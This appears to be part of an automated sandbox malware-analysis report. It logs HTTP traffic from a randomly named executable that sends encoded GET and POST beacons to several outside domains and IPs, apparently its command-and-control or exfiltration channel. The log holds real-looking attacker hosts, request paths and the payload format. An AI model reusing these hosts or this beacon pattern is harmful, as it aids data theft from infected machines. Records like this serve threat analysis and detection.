                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 63 33 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c5 59 5b 6f db 46 16 7e b6 7f c5 84 01 22 19 6b 91 96 93 26 b1 2c a9 d8 5c 80 64 e1 5c d0 b8 9b 2d 82 20 a0 c8 91 c4 58 22 15 92 b2 ec a6 01 72 d9 34 2d 1c 24 bb 45 81 f6 61 b1 4d 8b 7d 58 60 b1 80 ed c4 b5 6a c7 0e d0 5f 40 fe a3 fd ce cc 90 a2 2c d9 2e f6 61 37 6d 14 8a 33 73 e6 cc b9 7c e7 3b a3 f2 89 4b 37 2e 2e 7e 76 f3 32 6b 86 ed 16 bb f9 e9 85 85 ab 17 99 56 30 8c db a7 2f 1a c6 a5 c5 4b ec 4f 57 16 af 2d b0 a2 3e c3 6e 85 be 63 85 86 71 f9 ba c6 b4 66 18 76 4a 86 d1 eb f5 f4 de 69 dd f3 1b c6 e2 27 c6 0a 49 29 d2 32 f5 58 08 c4 1a dd 0e 6d ad 3a 59 16 9b ac b4 5b 6e 50 19 23 a0 38 37 37 27 d7 69 0c 93 4a 2d d3 6d 54 34 ee 6a 2c 7d 22 19 dc b4 ab 93 93 13 e5 36 0f 4d e6 9a 6d 5e d1 96 f8 6a cf f3 ed 40 63 96 e7 86 dc 0d 2b 5a f4 2e da 8f de 47 5b d1 de 34 8b 1f e3 df b7 51 3f 7e 12 3f c5 f3 7a fc 34 da 8f 1f 4f b3 c1 9c 68 2f 5e 8b b6 58 d4 97 4b a2 f5 31 8b be 84 80 d7 d9 35 fb d1 e6 34 b3 bd b6 e9 b8 d3 cc b1 f1 d1 6b 7a 4e 80 83 2a e5 52 65 42 [TRUNCATED]
                                                                    Data Ascii: c32Y[oF~"k&,\d\- X"r4-$EaM}X`j_@,.a7m3s|;K7..~v2kV0/KOW->ncqfvJi'I)2Xm:Y[nP#877'iJ-mT4j,}"6Mm^j@c+Z.G[4Q?~?z4Oh/^XK154kzN*ReBtx(4CnX/`SrE(/,vq.1*Zx<*+!^VXSF;VOC'lq<plweC\UT>Q(L+5-0fYP-t6eSzBsY5|uU/Sz4yE33JTPcQlkNrlrQ_C`@0-!_W)?geV3IG^->s7xxkSwfN@L|iVbwL{67~x=iF,X*?kaAm,p@]Pjmi~@QL=~?Su}Ss+d7]Hyc}y[p$&T/xmf+XZoguKzSJV|]/yji7>8DRU8dYV7Q[@lLD%@Pcrcz{[j:LL0)G9]Li`5<6R [TRUNCATED]
                                                                    Dec 5, 2024 09:45:51.317970037 CET1236INData Raw: d5 21 55 50 1c 96 13 d8 d1 aa 29 02 49 21 cd a2 94 32 81 b3 29 7b b7 4d bf e1 b8 a5 99 79 d6 41 cc 38 6e a3 34 a3 55 a3 1f a3 f5 e8 97 f8 29 8b 36 59 f4 01 d8 bd 1f 7f 19 6d 01 c7 9f 00 ad 09 ca a3 6d f1 b9 81 81 a7 d1 4e d4 17 fa 91 7a c2 25 93
                                                                    Data Ascii: !UP)I!2){MyA8n4U)6YmmNz%zZ7Km'[At1frU.2[#0C^t[~ q|n"*K,({u4nVSfi3XC5=@zRE{KQBj*K+MU
                                                                    Dec 5, 2024 09:45:51.317985058 CET844INData Raw: 3c 0a 42 a7 52 c2 06 27 27 a9 29 4c ff 64 6c 96 ab e7 c0 00 d3 11 7a 18 22 de 0f 12 d6 2d 19 b8 e2 5a 82 9d 81 35 1d b4 26 7c 36 e8 d4 4e d3 17 dc 2c e0 2e 86 9d fc fd b9 d9 62 71 4e 99 be 27 9a ca 12 ab 79 2d 1b 34 5b 31 e7 41 63 a8 88 77 a2 c9
                                                                    Data Ascii: <BR'')Ldlz"-Z5&|6N,.bqN'y-4[1Acw0NxEEKa]H<9PzL6+ZA]<,#;CyM-*TuYp15Idrh^du.}l2hJ~ ,0*HI'&&$l`sBU42


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.84974591.226.30.3805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:52.658715963 CET514OUTGET /v3s3/?dpy4vDKP=tyn9Xf4Tiyk8OMwOE2/3W7I6SfC4Fy+XuF+V6x+u+aHyo7NExtCHdgYtt4f9rPCqzYPXesK+A0TEw6Z3hMmMu6en0oemB8DST7EgTGpjLeWNMzHlOHw+YKqeTj7VW+MXtw==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.vpnto.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:45:53.979439974 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 31 63 65 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b4 d0 be d0 bc d0 b5 d0 bd 2c 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 82 d0 be d1 80 2c 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d1 8b d0 b5 20 d0 b8 d0 bc d0 b5 d0 bd d0 b0 2c 20 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b0 d1 86 d0 b8 d1 8f 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 be d0 b2 2c 20 64 6f 6d 61 69 6e 2c 20 69 64 [TRUNCATED]
                                                                    Data Ascii: 1ced<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta name="keywords" content=", , , , domain, idn, whois"><meta content="text/html" charset="utf-8" http-equiv="Content-Type" /><link rel="stylesheet" href="/style.css" type="text/css" /><title>Vpnto.net</title></head><body>... Yandex.Metrika counter --><script type="text/javascript">(function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter24408988 = new Ya.Metrika({id:24408988, webvisor:true, clickmap:true, trackLinks:true, accurateTrackBounce:true, trackHash:true}); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = (d.location.p [TRUNCATED]
                                                                    Dec 5, 2024 09:45:53.979496002 CET224INData Raw: 61 2f 77 61 74 63 68 2e 6a 73 22 3b 20 69 66 20 28 77 2e 6f 70 65 72 61 20 3d 3d 20 22 5b 6f 62 6a 65 63 74 20 4f 70 65 72 61 5d 22 29 20 7b 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64
                                                                    Data Ascii: a/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/244089
                                                                    Dec 5, 2024 09:45:53.979507923 CET1236INData Raw: 38 38 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 39 39 39 39 70 78 3b 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 2f 59 61 6e 64 65
                                                                    Data Ascii: 88" style="position:absolute; left:-9999px;" alt="" /></div></noscript>... /Yandex.Metrika counter --><div id="content"><div id="header"> <p id="top_info"><br /> <a href="https://i7.ru"><img src="/images/i7logo.png" alt="" wid
                                                                    Dec 5, 2024 09:45:53.979556084 CET1236INData Raw: 09 3c 2f 64 69 76 3e 2d 2d 3e 0a 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 65 66 74 5f 61 72 74 69 63 6c 65 73 22 3e 0a 09 09 09 20 20 3c 68 32 3e 26 6e 62 73 70 3b 3c 2f 68
                                                                    Data Ascii: </div>--><div class="left"><div class="left_articles"> <h2>&nbsp;</h2><a href="http://www.i7.ru/"><img src="/images/logobig.png" alt="i7.RU" width="130" height="146" class="thumbnail" style="border:none; margin-top:6px"/></a
                                                                    Dec 5, 2024 09:45:53.979598045 CET1236INData Raw: b2 d1 8b 20 d1 83 d0 b6 d0 b5 20 d1 81 d0 b4 d0 b5 d0 bb d0 b0 d0 bb d0 b8 2c 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 b2 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 bd d0 be d0 b5 20 d0 b8 d0 bc d1 8f 2e
                                                                    Data Ascii: , . .</p></div></div><div class="thirds"><
                                                                    Dec 5, 2024 09:45:53.979618073 CET1236INData Raw: 20 61 63 74 69 6f 6e 3d 27 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 37 2e 72 75 27 20 6e 61 6d 65 3d 27 7a 6f 6e 65 66 6f 72 6d 27 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
                                                                    Data Ascii: action='https://whois7.ru' name='zoneform' style="text-align:center"> <div class='f'> <input name="q" type="text" style="width:165px; font-size:14px; padding:3px; color: #A72119; font-weight: bold;" value="vpnto.ne
                                                                    Dec 5, 2024 09:45:53.979630947 CET1172INData Raw: d0 b5 d0 bd d0 bd d1 8b d1 85 20 d0 b8 d0 bc d0 b5 d0 bd 20 d0 b2 20 d0 b7 d0 be d0 bd d0 b5 20 2e 52 55 2c 20 d1 81 d0 b3 d1 80 d1 83 d0 bf d0 bf d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 bd d1 8b d1 85 20 d0 bf d0 be 20 d0 b4 d0 b0 d1 82 d0 b5 20
                                                                    Data Ascii: .RU, .


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.84974613.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:59.626393080 CET786OUTPOST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 2f 74 4a 41 68 76 33 70 63 73 68 32 42 49 4f 65 64 57 79 71 58 51 4c 78 75 59 36 58 57 54 64 4c 46 6d 55 6c 56 49 57 65 4f 75 41 4f 47 62 77 77 77 30 71 31 6e 73 63 4f 78 61 2f 67 74 2f 34 6f 78 6e 68 6e 4d 33 52 30 73 77 46 65 45 49 56 56 61 38 6d 58 6c 34 55 36 31 68 6e 52 6f 61 48 62 6b 44 70 65 49 65 64 6d 45 6b 7a 63 71 70 48 66 58 44 2f 32 57 72 4b 71 59 78 41 56 41 6f 7a 66 2b 6b 72 6a 73 73 62 6e 51 67 39 39 49 56 43 4e 55 44 72 43 6d 31 57 34 42 2f 39 37 58 55 4f 7a 6e 69 65 66 78 46 4c 67 39 4f 71 49 50 77 43 6a 31 75 44 6a 51 78 44 4f 43 49 4d 3d
                                                                    Data Ascii: dpy4vDKP=6kVhP62B5sMh/tJAhv3pcsh2BIOedWyqXQLxuY6XWTdLFmUlVIWeOuAOGbwww0q1nscOxa/gt/4oxnhnM3R0swFeEIVVa8mXl4U61hnRoaHbkDpeIedmEkzcqpHfXD/2WrKqYxAVAozf+krjssbnQg99IVCNUDrCm1W4B/97XUOzniefxFLg9OqIPwCj1uDjQxDOCIM=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.84974713.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:02.295723915 CET806OUTPOST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 35 4d 35 41 6a 49 44 70 61 4d 68 78 66 34 4f 65 53 32 79 75 58 51 58 78 75 61 58 53 52 67 35 4c 46 46 41 6c 62 70 57 65 50 75 41 4f 4a 37 77 50 75 45 71 79 6e 73 5a 7a 78 62 54 67 74 37 51 6f 78 6e 52 6e 4d 47 52 7a 73 67 46 63 4c 6f 56 4c 5a 4d 6d 58 6c 34 55 36 31 68 7a 33 6f 61 66 62 6b 7a 5a 65 4b 2f 64 6c 46 6b 7a 62 36 35 48 66 42 44 2f 49 57 72 4c 4a 59 30 67 76 41 71 37 66 2b 6d 7a 6a 76 2b 6a 6d 5a 67 39 33 47 31 44 6f 56 57 32 7a 72 45 47 6c 44 5a 77 41 51 45 57 63 6d 55 76 31 72 6e 44 6d 2b 4f 43 6a 50 7a 71 56 77 5a 65 4c 4b 53 54 2b 63 66 61 5a 44 44 36 66 77 38 46 6a 34 2f 71 38 70 4e 67 42 79 35 55 47
                                                                    Data Ascii: dpy4vDKP=6kVhP62B5sMh5M5AjIDpaMhxf4OeS2yuXQXxuaXSRg5LFFAlbpWePuAOJ7wPuEqynsZzxbTgt7QoxnRnMGRzsgFcLoVLZMmXl4U61hz3oafbkzZeK/dlFkzb65HfBD/IWrLJY0gvAq7f+mzjv+jmZg93G1DoVW2zrEGlDZwAQEWcmUv1rnDm+OCjPzqVwZeLKST+cfaZDD6fw8Fj4/q8pNgBy5UG


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.84974813.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:04.960588932 CET1823OUTPOST /vxa5/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.avalanchefi.xyz
                                                                    Origin: http://www.avalanchefi.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.avalanchefi.xyz/vxa5/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 36 6b 56 68 50 36 32 42 35 73 4d 68 35 4d 35 41 6a 49 44 70 61 4d 68 78 66 34 4f 65 53 32 79 75 58 51 58 78 75 61 58 53 52 67 78 4c 47 31 63 6c 55 75 43 65 4d 75 41 4f 58 72 77 4b 75 45 72 75 6e 6f 4e 33 78 61 76 77 74 39 55 6f 77 45 5a 6e 4b 79 6c 7a 6e 67 46 63 54 59 56 4b 61 38 6d 34 6c 37 73 2b 31 68 6a 33 6f 61 66 62 6b 31 39 65 4f 75 64 6c 49 45 7a 63 71 70 48 54 58 44 2f 7a 57 71 69 79 59 30 74 59 41 36 62 66 39 47 6a 6a 70 4e 62 6d 46 77 39 35 42 31 44 4b 56 57 79 6f 72 45 62 63 44 5a 74 49 51 47 57 63 6e 52 53 6f 77 57 44 45 69 66 4b 4f 4a 78 47 44 72 35 71 53 44 79 44 61 65 6f 2b 46 50 47 4b 4b 77 39 4a 4c 30 38 4c 47 2b 72 51 30 37 66 64 49 35 75 34 4b 37 74 30 62 61 57 48 31 66 49 64 42 4a 77 67 30 47 76 6d 69 77 4f 45 51 45 30 39 47 64 52 41 64 67 41 4d 6c 77 4b 32 62 36 70 64 61 72 7a 34 4b 4a 4a 6c 4f 67 46 6f 67 76 46 69 31 75 37 32 4c 49 66 71 78 75 6f 73 49 72 6a 73 61 69 70 63 71 6f 51 41 4a 2b 48 49 49 4c 33 63 35 39 49 77 2f 79 42 5a 66 43 79 36 33 64 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=6kVhP62B5sMh5M5AjIDpaMhxf4OeS2yuXQXxuaXSRgxLG1clUuCeMuAOXrwKuErunoN3xavwt9UowEZnKylzngFcTYVKa8m4l7s+1hj3oafbk19eOudlIEzcqpHTXD/zWqiyY0tYA6bf9GjjpNbmFw95B1DKVWyorEbcDZtIQGWcnRSowWDEifKOJxGDr5qSDyDaeo+FPGKKw9JL08LG+rQ07fdI5u4K7t0baWH1fIdBJwg0GvmiwOEQE09GdRAdgAMlwK2b6pdarz4KJJlOgFogvFi1u72LIfqxuosIrjsaipcqoQAJ+HIIL3c59Iw/yBZfCy63dxckh9360stdFwA5KegbMCfp3F77cE3eX5pnWap8vN2iZmN8/XKyolhJS07YS4bpryI46bY8iBB/KK/vkQbGztAle1m6idDI4fzhmvVgfS7CWAuRDS6ej2RQUXZOckxVKy0gvwU81afYwrpdzUE9aO5W9qATeuCOt5hyD0crn6cuZeJemJRQwZAiHvIaPkk1bMTO1TOaa+jTvO0ZsxsINpBN7sNdBw6F/WPA8OkgZdZ2dXC4VZKIMB1vOGP57sWkF+IZ/G6UQm2R/UNrFQUgn3WwLzbhj9SJBjJYsMeVdkLEK6g1BpfoYnUQYIJAOrfGKx++tLXL60MxTagHF36DpBWTiUVZhc6IiAGES/LXrPWb/pcjgw0Q9rwXR8gZSaQKSM3jGc99MnvJLfU6mHsAAXJQOScuq03Nf3+tMeRWGRzlQ/r1Rlh4eaNFhPNYS8e56+Zp+m4YOHJwAXtsuEsWj90AbM3DL1s48OZH+MtsUzbOu17p2dh/dWL244iDTBcQcOckOo3wB5tE3tKjdvWLB9aLdx09WO0sbcSZ9VnJ1MyVBl2CW5LbDbIVaGSbWpzhf1K6dbRJxCeW3jGm3TR5A8zkeHfnZpm6KQX2rAJ12DTgrnobDvNTjLT+hyxas/506kjdomlr6lC2pkHJGK1FACmgR7fzRmHeJUr [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.84974913.248.169.48805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:07.626533985 CET520OUTGET /vxa5/?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ== HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.avalanchefi.xyz
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:46:08.717693090 CET409INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 05 Dec 2024 08:46:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 269
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 74 38 3d 65 72 65 70 61 30 61 48 67 26 64 70 79 34 76 44 4b 50 3d 33 6d 39 42 4d 50 43 6f 32 38 67 50 78 2b 73 56 67 4b 58 77 53 38 49 6c 4a 4f 58 71 63 58 6d 47 54 43 33 69 68 61 37 44 65 52 49 79 48 57 51 32 55 35 79 49 45 6f 49 61 4b 72 42 59 77 6c 4b 57 6d 4a 41 4d 79 62 72 62 6b 76 38 75 67 47 34 4f 50 45 70 78 73 46 67 6b 46 36 5a 77 58 74 71 4e 69 50 51 35 38 68 44 4b 76 5a 69 51 74 52 70 46 4f 2b 6c 6a 4a 56 58 79 67 36 53 71 4e 68 36 52 4b 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?t8=erepa0aHg&dpy4vDKP=3m9BMPCo28gPx+sVgKXwS8IlJOXqcXmGTC3iha7DeRIyHWQ2U5yIEoIaKrBYwlKWmJAMybrbkv8ugG4OPEpxsFgkF6ZwXtqNiPQ58hDKvZiQtRpFO+ljJVXyg6SqNh6RKQ=="}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.849750185.27.134.144805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:46:14.634778023 CET774OUTPOST /pxvi/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.amayavp.xyz
                                                                    Origin: http://www.amayavp.xyz
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.amayavp.xyz/pxvi/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 2f 4a 5a 61 4c 69 30 45 61 52 4b 41 7a 46 4f 6d 78 43 50 47 39 72 63 41 39 35 66 42 43 64 37 48 75 4f 67 2b 4c 32 41 4c 78 77 6f 72 77 6d 41 7a 52 61 4e 46 2b 71 39 41 74 51 4b 4b 34 62 46 4a 35 6a 74 79 77 33 5a 51 52 34 78 32 43 4a 63 50 54 62 57 30 6c 37 7a 4e 78 72 6c 51 4d 53 39 33 74 57 6b 31 65 32 77 39 4d 41 6d 6e 6e 6f 75 56 62 61 2b 51 44 50 6b 5a 68 43 58 36 56 62 4f 50 45 76 79 39 4e 7a 49 55 38 49 55 6d 71 70 39 4f 2b 6d 75 6c 69 30 57 51 47 74 50 48 5a 4f 74 47 64 67 67 4f 46 32 4c 72 78 43 73 37 75 53 37 49 39 37 42 4a 74 75 7a 48 44 76 57 6e 6b 32 43 56 2b 50 2f 6e 74 72 63 3d
                                                                    Data Ascii: dpy4vDKP=/JZaLi0EaRKAzFOmxCPG9rcA95fBCd7HuOg+L2ALxworwmAzRaNF+q9AtQKK4bFJ5jtyw3ZQR4x2CJcPTbW0l7zNxrlQMS93tWk1e2w9MAmnnouVba+QDPkZhCX6VbOPEvy9NzIU8IUmqp9O+muli0WQGtPHZOtGdggOF2LrxCs7uS7I97BJtuzHDvWnk2CV+P/ntrc=
                                                                    Dec 5, 2024 09:46:15.690886021 CET685INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:46:15 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Cache-Control: no-cache
                                                                    Content-Encoding: br
                                                                    Data Raw: 31 62 62 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 53 d0 08 13 4d f5 dc 0f 5e 76 f9 62 c0 09 3f ff db cc 06 36 d0 d9 5c b3 67 7f 82 d4 83 63 6e 8d 40 bb 24 b0 4d a7 87 46 8d 00 79 52 d3 9e 61 36 92 76 11 f6 17 18 35 ad e8 c6 4d 85 66 2e 75 39 c1 c8 5d 78 06 e0 8c 85 cf ef da f8 21 17 79 61 48 a2 0e 35 82 55 59 eb 0e 02 96 ac a1 09 27 e4 1f e2 a1 fd 9f 22 f5 64 b7 1e 39 c0 b5 61 e0 f3 9b 1a 48 00 76 8d a5 75 e3 fc 5c 0a 47 7f e5 ef e9 5f 4c e6 00 d7 f3 b9 dc 5d ea 08 95 60 99 5a c0 98 3a 88 6b d7 32 ef db 5f 3b df 27 d6 07 2f e1 8d f9 74 df 97 38 c6 15 c6 c4 bf f8 90 40 23 2f e1 cb ae 7a 43 26 ff eb 1d 48 00 e8 3f b0 e3 8c 29 29 4c 2c 64 92 a4 26 17 bc d4 3c 63 85 30 8a 89 58 e5 98 50 65 f3 b6 28 b3 3c d7 a9 b5 b6 e4 3a 13 22 2f 45 cc 44 ca 4a a6 72 e1 ca 78 40 34 c0 b2 97 0a cd 13 c3 5d e1 0a 99 49 6d 12 a6 cb 3c 8f b5 28 f2 4c 8f a4 36 13 bd 6d ec 04 30 07 f8 f7 77 69 17 4b c0 3e d2 30 c1 ae 5f df 7f 84 c6 ea f9 6e ba f4 34 4d a9 a4 8a 10 1f d7 28 32 3f [TRUNCATED]
